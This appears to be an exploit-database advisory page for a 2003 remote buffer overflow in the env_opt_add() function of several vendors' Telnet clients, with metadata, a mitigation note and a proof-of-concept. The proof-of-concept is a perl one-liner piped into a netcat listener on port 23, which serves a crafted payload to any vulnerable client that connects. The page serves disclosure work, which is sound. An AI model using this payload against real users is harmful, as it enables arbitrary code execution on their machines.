header-logo
Suggest Exploit
vendor:
Telnet Client
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Buffer Overflow
119
CWE
Product Name: Telnet Client
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2003

Multiple Vendors’ Telnet Client Applications Buffer Overflow Vulnerability

A remote attacker may exploit this vulnerability to execute arbitrary code on some of the affected platforms in the context of a user that is using the vulnerable Telnet client to connect to a malicious server. The attacker can use a perl command to send a malicious payload to the vulnerable Telnet client.

Mitigation:

Upgrade to the latest version of the Telnet client application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12919/info

Multiple vendors' Telnet client applications are reported prone to a remote buffer-overflow vulnerability. This vulnerability reportedly occurs in the 'env_opt_add()' function in the 'telnet.c' source file, which is apparently common source for all the affected vendors.

A remote attacker may exploit this vulnerability to execute arbitrary code on some of the affected platforms in the context of a user that is using the vulnerable Telnet client to connect to a malicious server. 

perl -e 'print "\377", "\372\42\3\377\377\3\3" x 43, "\377\360"' | nc -l 23

Navigation

Suggest Exploit

Services By CQR